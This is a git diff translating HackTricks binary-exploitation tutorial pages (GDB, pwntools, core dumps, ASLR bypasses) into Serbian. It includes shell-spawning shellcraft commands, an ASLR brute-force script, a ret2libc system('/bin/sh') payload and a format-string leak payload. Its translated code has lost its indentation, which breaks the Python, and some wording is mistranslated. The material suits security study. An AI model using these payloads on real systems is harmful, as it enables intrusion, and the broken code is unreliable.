@@ -154,87 +141,80 @@ gef➤ bt #3 0x00000000004011a9 in ?? () #4 0x0000000000400a5a in ?? () ``` - ### GDB server -`gdbserver --multi 0.0.0.0:23947` (in IDA you have to fill the absolute path of the executable in the Linux machine and in the Windows machine) +`gdbserver --multi 0.0.0.0:23947` (u IDA morate uneti apsolutnu putanju izvršne datoteke na Linux mašini i na Windows mašini) ## Ghidra ### Find stack offset -**Ghidra** is very useful to find the the **offset** for a **buffer overflow thanks to the information about the position of the local variables.**\ -For example, in the example below, a buffer flow in `local_bc` indicates that you need an offset of `0xbc`. Moreover, if `local_10` is a canary cookie it indicates that to overwrite it from `local_bc` there is an offset of `0xac`.\ -&#xNAN;_Remember that the first 0x08 from where the RIP is saved belongs to the RBP._ +**Ghidra** je veoma korisna za pronalaženje **offset-a** za **buffer overflow zahvaljujući informacijama o poziciji lokalnih promenljivih.**\ +Na primer, u primeru ispod, buffer flow u `local_bc` ukazuje da vam je potreban offset od `0xbc`. Pored toga, ako je `local_10` kanarska kolačić, to ukazuje da da biste ga prepisali iz `local_bc` postoji offset od `0xac`.\ +&#xNAN;_Remember da prvih 0x08 odakle se čuva RIP pripada RBP._ ![](<../../../images/image (1061).png>) ## qtool - ```bash qltool run -v disasm --no-console --log-file disasm.txt --rootfs ./ ./prog ``` - -Get every opcode executed in the program. +Dobijte svaki opcode izvršen u programu. 
## GCC -**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Compile without protections\ -&#xNAN;**-o** --> Output\ -&#xNAN;**-g** --> Save code (GDB will be able to see it)\ -**echo 0 > /proc/sys/kernel/randomize_va_space** --> To deactivate the ASLR in linux +**gcc -fno-stack-protector -D_FORTIFY_SOURCE=0 -z norelro -z execstack 1.2.c -o 1.2** --> Kompajlirajte bez zaštita\ +&#xNAN;**-o** --> Izlaz\ +&#xNAN;**-g** --> Sačuvajte kod (GDB će moći da ga vidi)\ +**echo 0 > /proc/sys/kernel/randomize_va_space** --> Da deaktivirate ASLR u linuxu -**To compile a shellcode:**\ -**nasm -f elf assembly.asm** --> return a ".o"\ -**ld assembly.o -o shellcodeout** --> Executable +**Da kompajlirate shellcode:**\ +**nasm -f elf assembly.asm** --> vraća ".o"\ +**ld assembly.o -o shellcodeout** --> Izvršni ## Objdump -**-d** --> **Disassemble executable** sections (see opcodes of a compiled shellcode, find ROP Gadgets, find function address...)\ -&#xNAN;**-Mintel** --> **Intel** syntax\ -&#xNAN;**-t** --> **Symbols** table\ -&#xNAN;**-D** --> **Disassemble all** (address of static variable)\ -&#xNAN;**-s -j .dtors** --> dtors section\ -&#xNAN;**-s -j .got** --> got section\ --D -s -j .plt --> **plt** section **decompiled**\ -&#xNAN;**-TR** --> **Relocations**\ -**ojdump -t --dynamic-relo ./exec | grep puts** --> Address of "puts" to modify in GOT\ -**objdump -D ./exec | grep "VAR_NAME"** --> Address or a static variable (those are stored in DATA section). 
+**-d** --> **Disasemblirajte izvršne** sekcije (vidite opkode kompajliranog shellcode-a, pronađite ROP Gadgets, pronađite adresu funkcije...)\ +&#xNAN;**-Mintel** --> **Intel** sintaksa\ +&#xNAN;**-t** --> **Tabela** simbola\ +&#xNAN;**-D** --> **Disasemblirajte sve** (adresa statične promenljive)\ +&#xNAN;**-s -j .dtors** --> dtors sekcija\ +&#xNAN;**-s -j .got** --> got sekcija\ +-D -s -j .plt --> **plt** sekcija **dekompilirana**\ +&#xNAN;**-TR** --> **Relokacije**\ +**ojdump -t --dynamic-relo ./exec | grep puts** --> Adresa "puts" za modifikaciju u GOT\ +**objdump -D ./exec | grep "VAR_NAME"** --> Adresa ili statična promenljiva (one su smeštene u DATA sekciji). ## Core dumps -1. Run `ulimit -c unlimited` before starting my program -2. Run `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` +1. Pokrenite `ulimit -c unlimited` pre nego što pokrenete moj program +2. Pokrenite `sudo sysctl -w kernel.core_pattern=/tmp/core-%e.%p.%h.%t` 3. sudo gdb --core=\ --quiet -## More +## Više -**ldd executable | grep libc.so.6** --> Address (if ASLR, then this change every time)\ -**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Loop to see if the address changes a lot\ -**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset of "system"\ -**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset of "/bin/sh" +**ldd izvršni | grep libc.so.6** --> Adresa (ako je ASLR, onda se ovo menja svaki put)\ +**for i in \`seq 0 20\`; do ldd \ | grep libc; done** --> Petlja da vidite da li se adresa mnogo menja\ +**readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system** --> Offset "system"\ +**strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh** --> Offset "/bin/sh" -**strace executable** --> Functions called by the executable\ -**rabin2 -i ejecutable -->** Address of all the functions +**strace izvršni** --> Funkcije koje poziva izvršni\ +**rabin2 -i ejecutable -->** Adresa svih funkcija ## **Inmunity debugger** - ```bash !mona 
modules #Get protections, look for all false except last one (Dll of SO) !mona find -s "\xff\xe4" -m name_unsecure.dll #Search for opcodes insie dll space (JMP ESP) ``` - ## IDA -### Debugging in remote linux - -Inside the IDA folder you can find binaries that can be used to debug a binary inside a linux. To do so move the binary `linux_server` or `linux_server64` inside the linux server and run it nside the folder that contains the binary: +### Debugging u udaljenom linuxu +Unutar IDA fascikle možete pronaći binarne datoteke koje se mogu koristiti za debagovanje binarne datoteke unutar linuxa. Da biste to uradili, premestite binarnu datoteku `linux_server` ili `linux_server64` unutar linux servera i pokrenite je unutar fascikle koja sadrži binarnu datoteku: ``` ./linux_server64 -Ppass ``` - -Then, configure the debugger: Debugger (linux remote) --> Proccess options...: +Zatim, konfigurišite debager: Debugger (linux remote) --> Opcije procesa...: ![](<../../../images/image (858).png>) diff --git a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md index 6175aeaa2..e6dc428bd 100644 --- a/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md +++ b/src/binary-exploitation/basic-stack-binary-exploitation-methodology/tools/pwntools.md 
@@ -1,120 +1,100 @@ # PwnTools {{#include ../../../banners/hacktricks-training.md}} - ``` pip3 install pwntools ``` - ## Pwn asm -Get **opcodes** from line or file. - +Dobijte **opkode** iz linije ili fajla. ``` pwn asm "jmp esp" pwn asm -i ``` +**Može se odabrati:** -**Can select:** - -- output type (raw,hex,string,elf) -- output file context (16,32,64,linux,windows...) -- avoid bytes (new lines, null, a list) -- select encoder debug shellcode using gdb run the output +- tip izlaza (raw, hex, string, elf) +- kontekst izlaza (16, 32, 64, linux, windows...) +- izbegavanje bajtova (nove linije, null, lista) +- odabrati enkoder za debagovanje shellcode-a koristeći gdb za pokretanje izlaza ## **Pwn checksec** -Checksec script - +Checksec skripta ``` pwn checksec ``` - ## Pwn constgrep ## Pwn cyclic -Get a pattern - +Dobijte obrazac ``` pwn cyclic 3000 pwn cyclic -l faad ``` +**Može se odabrati:** -**Can select:** - -- The used alphabet (lowercase chars by default) -- Length of uniq pattern (default 4) -- context (16,32,64,linux,windows...) -- Take the offset (-l) +- Korišćeni alfabet (mala slova po defaultu) +- Dužina jedinstvenog obrasca (podrazumevano 4) +- kontekst (16,32,64,linux,windows...) +- Uzmite ofset (-l) ## Pwn debug -Attach GDB to a process - +Priključite GDB na proces ``` pwn debug --exec /bin/bash pwn debug --pid 1234 pwn debug --process bash ``` +**Može se odabrati:** -**Can select:** - -- By executable, by name or by pid context (16,32,64,linux,windows...) -- gdbscript to execute +- Po izvršnom fajlu, po imenu ili po pid kontekstu (16,32,64,linux,windows...) +- gdbscript za izvršavanje - sysrootpath ## Pwn disablenx -Disable nx of a binary - +Onemogući nx binarnog fajla ``` pwn disablenx ``` - ## Pwn disasm -Disas hex opcodes - +Disas hex opkode ``` pwn disasm ffe4 ``` +**Može se odabrati:** -**Can select:** - -- context (16,32,64,linux,windows...) -- base addres -- color(default)/no color +- kontekst (16,32,64,linux,windows...) 
+- osnovna adresa +- boja(podrazumevano)/bez boje ## Pwn elfdiff -Print differences between 2 files - +Ispisuje razlike između 2 datoteke ``` pwn elfdiff ``` - ## Pwn hex -Get hexadecimal representation - +Dobijte heksadecimalnu reprezentaciju ```bash pwn hex hola #Get hex of "hola" ascii ``` - ## Pwn phd -Get hexdump - +Dobij hexdump ``` pwn phd ``` +**Može se odabrati:** -**Can select:** - -- Number of bytes to show -- Number of bytes per line highlight byte -- Skip bytes at beginning +- Broj bajtova za prikaz +- Broj bajtova po liniji istaknutog bajta +- Preskoči bajtove na početku ## Pwn pwnstrip @@ -122,8 +102,7 @@ pwn phd ## Pwn shellcraft -Get shellcodes - +Dobijanje shellcode-ova ``` pwn shellcraft -l #List shellcodes pwn shellcraft -l amd #Shellcode with amd in the name 
@@ -131,46 +110,39 @@ pwn shellcraft -f hex amd64.linux.sh #Create in C and run pwn shellcraft -r amd64.linux.sh #Run to test. Get shell pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` +**Može se izabrati:** -**Can select:** +- shellcode i argumenti za shellcode +- Izlazna datoteka +- format izlaza +- debagovanje (priključiti dbg na shellcode) +- pre (debug trap pre koda) +- posle +- izbegavati korišćenje opkoda (podrazumevano: ne null i nova linija) +- Pokreni shellcode +- Boja/bez boje +- lista syscalls +- lista mogućih shellcode-ova +- Generiši ELF kao deljenu biblioteku -- shellcode and arguments for the shellcode -- Out file -- output format -- debug (attach dbg to shellcode) -- before (debug trap before code) -- after -- avoid using opcodes (default: not null and new line) -- Run the shellcode -- Color/no color -- list syscalls -- list possible shellcodes -- Generate ELF as a shared library - -## Pwn template - -Get a python template +## Pwn šablon +Dobijte python šablon ``` pwn template ``` - -**Can select:** host, port, user, pass, path and quiet +**Može se odabrati:** host, port, user, pass, path i quiet ## Pwn unhex -From hex to string - +Iz heksadecimalnog u string ``` pwn unhex 686f6c61 ``` +## Pwn ažuriranje -## Pwn update - -To update pwntools - +Da ažurirate pwntools ``` pwn update ``` - {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/README.md index 47681ba71..929ee4e69 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/README.md 
@@ -1,35 +1,29 @@ -# Common Binary Exploitation Protections & Bypasses +# Uobičajene zaštite i zaobilaženja u binarnom eksploatisanju {{#include ../../banners/hacktricks-training.md}} -## Enable Core files +## Omogućite Core datoteke -**Core files** are a type of file generated by an operating system when a process crashes. These files capture the memory image of the crashed process at the time of its termination, including the process's memory, registers, and program counter state, among other details. This snapshot can be extremely valuable for debugging and understanding why the crash occurred. +**Core datoteke** su vrsta datoteke koju generiše operativni sistem kada proces doživi pad. Ove datoteke beleže sliku memorije padenog procesa u trenutku njegovog završetka, uključujući memoriju procesa, registre i stanje programskog brojača, među ostalim detaljima. Ova slika može biti izuzetno korisna za debagovanje i razumevanje zašto je došlo do pada. -### **Enabling Core Dump Generation** +### **Omogućavanje generisanja Core dump-a** -By default, many systems limit the size of core files to 0 (i.e., they do not generate core files) to save disk space. To enable the generation of core files, you can use the **`ulimit`** command (in bash or similar shells) or configure system-wide settings. - -- **Using ulimit**: The command `ulimit -c unlimited` allows the current shell session to create unlimited-sized core files. This is useful for debugging sessions but is not persistent across reboots or new sessions. +Podrazumevano, mnogi sistemi ograničavaju veličinu core datoteka na 0 (tj. ne generišu core datoteke) kako bi uštedeli prostor na disku. Da biste omogućili generisanje core datoteka, možete koristiti komandu **`ulimit`** (u bash-u ili sličnim shell-ovima) ili konfigurisati sistemske postavke. +- **Korišćenje ulimit**: Komanda `ulimit -c unlimited` omogućava trenutnoj shell sesiji da kreira core datoteke neograničene veličine. 
Ovo je korisno za debagovanje sesija, ali nije trajno nakon ponovnog pokretanja ili novih sesija. ```bash ulimit -c unlimited ``` - -- **Persistent Configuration**: For a more permanent solution, you can edit the `/etc/security/limits.conf` file to include a line like `* soft core unlimited`, which allows all users to generate unlimited size core files without having to set ulimit manually in their sessions. - +- **Trajna Konfiguracija**: Za trajno rešenje, možete urediti datoteku `/etc/security/limits.conf` da uključite liniju kao što je `* soft core unlimited`, koja omogućava svim korisnicima da generišu core datoteke neograničene veličine bez potrebe da ručno postavljaju ulimit u svojim sesijama. ```markdown - soft core unlimited ``` +### **Analiza Core Fajlova sa GDB** -### **Analyzing Core Files with GDB** - -To analyze a core file, you can use debugging tools like GDB (the GNU Debugger). Assuming you have an executable that produced a core dump and the core file is named `core_file`, you can start the analysis with: - +Da biste analizirali core fajl, možete koristiti alate za debagovanje kao što je GDB (GNU Debugger). Pretpostavljajući da imate izvršni fajl koji je proizveo core dump i da se core fajl zove `core_file`, možete započeti analizu sa: ```bash gdb /path/to/executable /path/to/core_file ``` - -This command loads the executable and the core file into GDB, allowing you to inspect the state of the program at the time of the crash. You can use GDB commands to explore the stack, examine variables, and understand the cause of the crash. +Ova komanda učitava izvršni fajl i core fajl u GDB, omogućavajući vam da pregledate stanje programa u trenutku pada. Možete koristiti GDB komande da istražite stek, ispitujete promenljive i razumete uzrok pada. {{#include ../../banners/hacktricks-training.md}} 
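Review bot: the `limits.conf` fence in hunk `@@ -1,35 +1,29 @@` still reads `- soft core unlimited` while the translated bullet right above it (`+- **Trajna Konfiguracija**: ...`) says `* soft core unlimited`; the domain field in `/etc/security/limits.conf` must be `*` (or a user or group name), so the fence content contradicts the prose and would not work if copied. Since this hunk already rewrites the neighbouring line, fix the fence to `* soft core unlimited` and drop the `markdown` language tag (it is a config fragment, not Markdown). Also, the blank line between each bullet and the fence that follows it was removed in this hunk; it still renders, but it is inconsistent with the untouched files and makes the rest of the patch harder to review.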
diff --git a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md index e33c7a3be..d9792b187 100644 --- a/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md +++ b/src/binary-exploitation/common-binary-protections-and-bypasses/aslr/README.md 
@@ -2,107 +2,92 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## Osnovne Informacije -**Address Space Layout Randomization (ASLR)** is a security technique used in operating systems to **randomize the memory addresses** used by system and application processes. By doing so, it makes it significantly harder for an attacker to predict the location of specific processes and data, such as the stack, heap, and libraries, thereby mitigating certain types of exploits, particularly buffer overflows. +**Address Space Layout Randomization (ASLR)** je tehnika bezbednosti koja se koristi u operativnim sistemima za **randomizaciju memorijskih adresa** koje koriste sistemski i aplikativni procesi. Na taj način, značajno otežava napadaču da predvidi lokaciju specifičnih procesa i podataka, kao što su stek, heap i biblioteke, čime se ublažavaju određene vrste eksploatacija, posebno prelivanja bafera. -### **Checking ASLR Status** +### **Proveravanje ASLR Statusa** -To **check** the ASLR status on a Linux system, you can read the value from the **`/proc/sys/kernel/randomize_va_space`** file. The value stored in this file determines the type of ASLR being applied: +Da biste **proverili** ASLR status na Linux sistemu, možete pročitati vrednost iz **`/proc/sys/kernel/randomize_va_space`** datoteke. Vrednost koja se čuva u ovoj datoteci određuje tip ASLR-a koji se primenjuje: -- **0**: No randomization. Everything is static. -- **1**: Conservative randomization. Shared libraries, stack, mmap(), VDSO page are randomized. -- **2**: Full randomization. In addition to elements randomized by conservative randomization, memory managed through `brk()` is randomized. - -You can check the ASLR status with the following command: +- **0**: Nema randomizacije. Sve je statično. +- **1**: Konzervativna randomizacija. Deljene biblioteke, stek, mmap(), VDSO stranica su randomizovane. +- **2**: Potpuna randomizacija. 
Pored elemenata randomizovanih konzervativnom randomizacijom, memorija koja se upravlja putem `brk()` je randomizovana. +Možete proveriti ASLR status sledećom komandom: ```bash cat /proc/sys/kernel/randomize_va_space ``` +### **Onemogućavanje ASLR-a** -### **Disabling ASLR** - -To **disable** ASLR, you set the value of `/proc/sys/kernel/randomize_va_space` to **0**. Disabling ASLR is generally not recommended outside of testing or debugging scenarios. Here's how you can disable it: - +Da biste **onemogućili** ASLR, postavite vrednost `/proc/sys/kernel/randomize_va_space` na **0**. Onemogućavanje ASLR-a se generalno ne preporučuje van testiranja ili debagovanja. Evo kako možete to da uradite: ```bash echo 0 | sudo tee /proc/sys/kernel/randomize_va_space ``` - -You can also disable ASLR for an execution with: - +Možete takođe onemogućiti ASLR za izvršavanje sa: ```bash setarch `arch` -R ./bin args setarch `uname -m` -R ./bin args ``` +### **Omogućavanje ASLR** -### **Enabling ASLR** - -To **enable** ASLR, you can write a value of **2** to the `/proc/sys/kernel/randomize_va_space` file. This typically requires root privileges. Enabling full randomization can be done with the following command: - +Da biste **omogućili** ASLR, možete napisati vrednost **2** u datoteku `/proc/sys/kernel/randomize_va_space`. To obično zahteva root privilegije. Puno nasumično raspoređivanje može se izvršiti sledećom komandom: ```bash echo 2 | sudo tee /proc/sys/kernel/randomize_va_space ``` +### **Persistencija kroz ponovna pokretanja** -### **Persistence Across Reboots** - -Changes made with the `echo` commands are temporary and will be reset upon reboot. To make the change persistent, you need to edit the `/etc/sysctl.conf` file and add or modify the following line: - +Promene napravljene sa `echo` komandama su privremene i biće resetovane prilikom ponovnog pokretanja. 
Da biste promenu učinili trajnom, potrebno je da uredite datoteku `/etc/sysctl.conf` i dodate ili izmenite sledeću liniju: ```tsconfig kernel.randomize_va_space=2 # Enable ASLR # or kernel.randomize_va_space=0 # Disable ASLR ``` - -After editing `/etc/sysctl.conf`, apply the changes with: - +Nakon uređivanja `/etc/sysctl.conf`, primenite promene sa: ```bash sudo sysctl -p ``` +Ovo će osigurati da vaša ASLR podešavanja ostanu nakon ponovnog pokretanja. -This will ensure that your ASLR settings remain across reboots. - -## **Bypasses** +## **Obilaženja** ### 32bit brute-forcing -PaX divides the process address space into **3 groups**: +PaX deli adresni prostor procesa na **3 grupe**: -- **Code and data** (initialized and uninitialized): `.text`, `.data`, and `.bss` —> **16 bits** of entropy in the `delta_exec` variable. This variable is randomly initialized with each process and added to the initial addresses. -- **Memory** allocated by `mmap()` and **shared libraries** —> **16 bits**, named `delta_mmap`. -- **The stack** —> **24 bits**, referred to as `delta_stack`. However, it effectively uses **11 bits** (from the 10th to the 20th byte inclusive), aligned to **16 bytes** —> This results in **524,288 possible real stack addresses**. +- **Kod i podaci** (inicijalizovani i neinicijalizovani): `.text`, `.data`, i `.bss` —> **16 bita** entropije u `delta_exec` varijabli. Ova varijabla se nasumično inicijalizuje sa svakim procesom i dodaje se početnim adresama. +- **Memorija** alocirana pomoću `mmap()` i **deljene biblioteke** —> **16 bita**, nazvana `delta_mmap`. +- **Stek** —> **24 bita**, nazvana `delta_stack`. Međutim, efektivno koristi **11 bita** (od 10. do 20. bajta uključivo), poravnato na **16 bajtova** —> Ovo rezultira sa **524,288 mogućih stvarnih adresa steka**. -The previous data is for 32-bit systems and the reduced final entropy makes possible to bypass ASLR by retrying the execution once and again until the exploit completes successfully. 
+Prethodni podaci su za 32-bitne sisteme, a smanjena konačna entropija omogućava obilaženje ASLR ponovnim pokušajem izvršavanja iznova i iznova dok se eksploatacija ne završi uspešno. -#### Brute-force ideas: - -- If you have a big enough overflow to host a **big NOP sled before the shellcode**, you could just brute-force addresses in the stack until the flow **jumps over some part of the NOP sled**. - - Another option for this in case the overflow is not that big and the exploit can be run locally is possible to **add the NOP sled and shellcode in an environment variable**. -- If the exploit is local, you can try to brute-force the base address of libc (useful for 32bit systems): +#### Ideje za brute-force: +- Ako imate dovoljno veliki overflow da smestite **veliki NOP sled pre shellcode-a**, mogli biste jednostavno brute-force adrese na steku dok tok **ne preskoči neki deo NOP sled-a**. +- Druga opcija za ovo, u slučaju da overflow nije toliko veliki i da se eksploatacija može pokrenuti lokalno, je moguće **dodati NOP sled i shellcode u promenljivu okruženja**. +- Ako je eksploatacija lokalna, možete pokušati da brute-force osnovnu adresu libc (korisno za 32bitne sisteme): ```python for off in range(0xb7000000, 0xb8000000, 0x1000): ``` - -- If attacking a remote server, you could try to **brute-force the address of the `libc` function `usleep`**, passing as argument 10 (for example). If at some point the **server takes 10s extra to respond**, you found the address of this function. +- Ako napadate udaljeni server, možete pokušati da **brute-force-ujete adresu funkcije `libc` `usleep`**, prosledjujući kao argument 10 (na primer). Ako u nekom trenutku **serveru treba dodatnih 10s da odgovori**, pronašli ste adresu ove funkcije. > [!TIP] -> In 64bit systems the entropy is much higher and this shouldn't possible. +> U 64-bitnim sistemima entropija je mnogo veća i ovo ne bi trebalo da bude moguće. 
-### 64 bits stack brute-forcing - -It's possible to occupy a big part of the stack with env variables and then try to abuse the binary hundreds/thousands of times locally to exploit it.\ -The following code shows how it's possible to **just select an address in the stack** and every **few hundreds of executions** that address will contain the **NOP instruction**: +### Brute-forcing 64-bitnog steka +Moguće je zauzeti veliki deo steka sa env varijablama i zatim pokušati da zloupotrebite binarni fajl stotine/hiljade puta lokalno da biste ga iskoristili.\ +Sledeći kod pokazuje kako je moguće **samo odabrati adresu u steku** i svaka **nekoliko stotina izvršenja** ta adresa će sadržati **NOP instrukciju**: ```c //clang -o aslr-testing aslr-testing.c -fno-stack-protector -Wno-format-security -no-pie #include int main() { - unsigned long long address = 0xffffff1e7e38; - unsigned int* ptr = (unsigned int*)address; - unsigned int value = *ptr; - printf("The 4 bytes from address 0xffffff1e7e38: 0x%x\n", value); - return 0; +unsigned long long address = 0xffffff1e7e38; +unsigned int* ptr = (unsigned int*)address; +unsigned int value = *ptr; +printf("The 4 bytes from address 0xffffff1e7e38: 0x%x\n", value); +return 0; } ``` 
@@ -117,70 +102,68 @@ shellcode_env_var = nop * n_nops # Define the environment variables you want to set env_vars = { - 'a': shellcode_env_var, - 'b': shellcode_env_var, - 'c': shellcode_env_var, - 'd': shellcode_env_var, - 'e': shellcode_env_var, - 'f': shellcode_env_var, - 'g': shellcode_env_var, - 'h': shellcode_env_var, - 'i': shellcode_env_var, - 'j': shellcode_env_var, - 'k': shellcode_env_var, - 'l': shellcode_env_var, - 'm': shellcode_env_var, - 'n': shellcode_env_var, - 'o': shellcode_env_var, - 'p': shellcode_env_var, +'a': shellcode_env_var, +'b': shellcode_env_var, +'c': shellcode_env_var, +'d': shellcode_env_var, +'e': shellcode_env_var, +'f': shellcode_env_var, +'g': shellcode_env_var, +'h': shellcode_env_var, +'i': shellcode_env_var, +'j': shellcode_env_var, +'k': shellcode_env_var, +'l': shellcode_env_var, +'m': shellcode_env_var, +'n': shellcode_env_var, +'o': shellcode_env_var, +'p': shellcode_env_var, } cont = 0 while True: - cont += 1 +cont += 1 - if cont % 10000 == 0: - break +if cont % 10000 == 0: +break - print(cont, end="\r") - # Define the path to your binary - binary_path = './aslr-testing' +print(cont, end="\r") +# Define the path to your binary +binary_path = './aslr-testing' - try: - process = subprocess.Popen(binary_path, env=env_vars, stdout=subprocess.PIPE, text=True) - output = process.communicate()[0] - if "0xd5" in str(output): - print(str(cont) + " -> " + output) - except Exception as e: - print(e) - print(traceback.format_exc()) - pass +try: +process = subprocess.Popen(binary_path, env=env_vars, stdout=subprocess.PIPE, text=True) +output = process.communicate()[0] +if "0xd5" in str(output): +print(str(cont) + " -> " + output) +except Exception as e: +print(e) +print(traceback.format_exc()) +pass ``` -
-### Local Information (`/proc/[pid]/stat`) +### Lokalne informacije (`/proc/[pid]/stat`) -The file **`/proc/[pid]/stat`** of a process is always readable by everyone and it **contains interesting** information such as: +Datoteka **`/proc/[pid]/stat`** procesa je uvek čitljiva za sve i **sadrži zanimljive** informacije kao što su: -- **startcode** & **endcode**: Addresses above and below with the **TEXT** of the binary -- **startstack**: The address of the start of the **stack** -- **start_data** & **end_data**: Addresses above and below where the **BSS** is -- **kstkesp** & **kstkeip**: Current **ESP** and **EIP** addresses -- **arg_start** & **arg_end**: Addresses above and below where **cli arguments** are. -- **env_start** &**env_end**: Addresses above and below where **env variables** are. +- **startcode** & **endcode**: Adrese iznad i ispod sa **TEXT**-om binarnog fajla +- **startstack**: Adresa početka **stack**-a +- **start_data** & **end_data**: Adrese iznad i ispod gde se nalazi **BSS** +- **kstkesp** & **kstkeip**: Trenutne **ESP** i **EIP** adrese +- **arg_start** & **arg_end**: Adrese iznad i ispod gde su **cli argumenti**. +- **env_start** &**env_end**: Adrese iznad i ispod gde su **env varijable**. -Therefore, if the attacker is in the same computer as the binary being exploited and this binary doesn't expect the overflow from raw arguments, but from a different **input that can be crafted after reading this file**. It's possible for an attacker to **get some addresses from this file and construct offsets from them for the exploit**. +Dakle, ako je napadač na istom računaru kao i binarni fajl koji se eksploatiše i ovaj binarni fajl ne očekuje prelivanje iz sirovih argumenata, već iz različitog **ulaza koji se može kreirati nakon čitanja ove datoteke**. Moguće je da napadač **dobije neke adrese iz ove datoteke i konstruira ofsete iz njih za eksploataciju**. 
> [!TIP] -> For more info about this file check [https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html) searching for `/proc/pid/stat` +> Za više informacija o ovoj datoteci proverite [https://man7.org/linux/man-pages/man5/proc.5.html](https://man7.org/linux/man-pages/man5/proc.5.html) pretražujući `/proc/pid/stat` -### Having a leak +### Imati leak -- **The challenge is giving a leak** - -If you are given a leak (easy CTF challenges), you can calculate offsets from it (supposing for example that you know the exact libc version that is used in the system you are exploiting). This example exploit is extract from the [**example from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak) (check that page for more details): +- **Izazov je dati leak** +Ako dobijete leak (laki CTF izazovi), možete izračunati ofsete iz njega (pretpostavljajući na primer da znate tačnu verziju libc koja se koristi u sistemu koji eksploatišete). Ovaj primer eksploatacije je izvučen iz [**primera ovde**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak) (proverite tu stranicu za više detalja): ```python from pwn import * @@ -195,20 +178,19 @@ libc.address = system_leak - libc.sym['system'] log.success(f'LIBC base: {hex(libc.address)}') payload = flat( - 'A' * 32, - libc.sym['system'], - 0x0, # return address - next(libc.search(b'/bin/sh')) +'A' * 32, +libc.sym['system'], +0x0, # return address +next(libc.search(b'/bin/sh')) ) p.sendline(payload) p.interactive() ``` - - **ret2plt** -Abusing a buffer overflow it would be possible to exploit a **ret2plt** to exfiltrate an address of a function from the libc. Check: +Zloupotrebljavajući buffer overflow, bilo bi moguće iskoristiti **ret2plt** za eksfiltraciju adrese funkcije iz libc. Proverite: {{#ref}} ret2plt.md 
@@ -216,8 +198,7 @@ ret2plt.md - **Format Strings Arbitrary Read** -Just like in ret2plt, if you have an arbitrary read via a format strings vulnerability it's possible to exfiltrate te address of a **libc function** from the GOT. The following [**example is from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got): - +Baš kao u ret2plt, ako imate proizvoljno čitanje putem ranjivosti format stringova, moguće je eksfiltrirati adresu **libc funkcije** iz GOT-a. Sledeći [**primer je odavde**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/plt_and_got): ```python payload = p32(elf.got['puts']) # p64() if 64-bit payload += b'|' @@ -228,8 +209,7 @@ payload += b'%3$s' # The third parameter points at the start of the payload = payload.ljust(40, b'A') # 40 is the offset until you're overwriting the instruction pointer payload += p32(elf.symbols['main']) ``` - -You can find more info about Format Strings arbitrary read in: +Možete pronaći više informacija o Format Strings proizvoljnom čitanju u: {{#ref}} ../../format-strings/ @@ -237,7 +217,7 @@ You can find more info about Format Strings arbitrary read in: ### Ret2ret & Ret2pop -Try to bypass ASLR abusing addresses inside the stack: +Pokušajte da zaobiđete ASLR zloupotrebom adresa unutar steka: {{#ref}} ret2ret.md 
@@ -245,13 +225,12 @@ ret2ret.md ### vsyscall -The **`vsyscall`** mechanism serves to enhance performance by allowing certain system calls to be executed in user space, although they are fundamentally part of the kernel. The critical advantage of **vsyscalls** lies in their **fixed addresses**, which are not subject to **ASLR** (Address Space Layout Randomization). This fixed nature means that attackers do not require an information leak vulnerability to determine their addresses and use them in an exploit.\ -However, no super interesting gadgets will be find here (although for example it's possible to get a `ret;` equivalent) +**`vsyscall`** mehanizam služi za poboljšanje performansi omogućavajući izvršavanje određenih sistemskih poziva u korisničkom prostoru, iako su oni suštinski deo jezgra. Kritična prednost **vsyscall-a** leži u njihovim **fiksnim adresama**, koje nisu podložne **ASLR** (Randomizacija rasporeda adresnog prostora). Ova fiksna priroda znači da napadači ne zahtevaju ranjivost za curenje informacija da bi odredili svoje adrese i koristili ih u eksploatu.\ +Međutim, ovde se neće naći super zanimljivi gadgeti (iako je, na primer, moguće dobiti ekvivalent `ret;`) -(The following example and code is [**from this writeup**](https://guyinatuxedo.github.io/15-partial_overwrite/hacklu15_stackstuff/index.html#exploitation)) - -For instance, an attacker might use the address `0xffffffffff600800` within an exploit. While attempting to jump directly to a `ret` instruction might lead to instability or crashes after executing a couple of gadgets, jumping to the start of a `syscall` provided by the **vsyscall** section can prove successful. By carefully placing a **ROP** gadget that leads execution to this **vsyscall** address, an attacker can achieve code execution without needing to bypass **ASLR** for this part of the exploit. 
